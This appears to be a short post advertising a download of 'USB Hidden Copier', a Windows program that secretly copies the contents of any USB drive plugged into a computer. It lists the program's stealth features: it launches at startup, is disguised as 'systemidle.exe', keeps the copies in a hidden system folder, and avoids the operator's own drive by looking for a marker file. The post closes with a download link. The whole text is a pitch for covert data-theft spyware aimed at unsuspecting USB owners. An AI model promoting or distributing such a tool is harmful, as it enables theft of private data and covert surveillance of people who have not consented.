This sneaky little program will copy any USB drive content to your hard drive without detection of the USB owner. Read more on next page.
1. It is totally invisible and masked enough in order not to be detected easily.
2. It will copy a maximum of 8GB that is enough space and information will not fit all hard drive space if you can not monitor it for a long time.
3. Content is saved in a folder named as the copied Usb Drive name so you can find easily who is the owner of usb copied.
4. It starts at startup of computer.
5. First copy is made 3 minutes after computer starts and then every 10 minutes the content will be overwritten, so you will have always lasted content of that USB.
6. With it’s Control Panel you can easily manage it.
7. Content copied is saved by default in: “C:\WINDOWS\sysbackup\”
8. The copier program is called “systemidle.exe” in order to mask it.
9. In order not to copy you own USB Drive you can create a file named “friendflag.winxp” and put it directly on your usb (this file can be also with hidden and system attributes so you will not delete it accidentally). So when the program finds this file it will not copy the drive when it is located (your usb).
Download Link: http://hotfile.com/dl/44448177/a545fb5/USB.Hidden.Copier.rar.html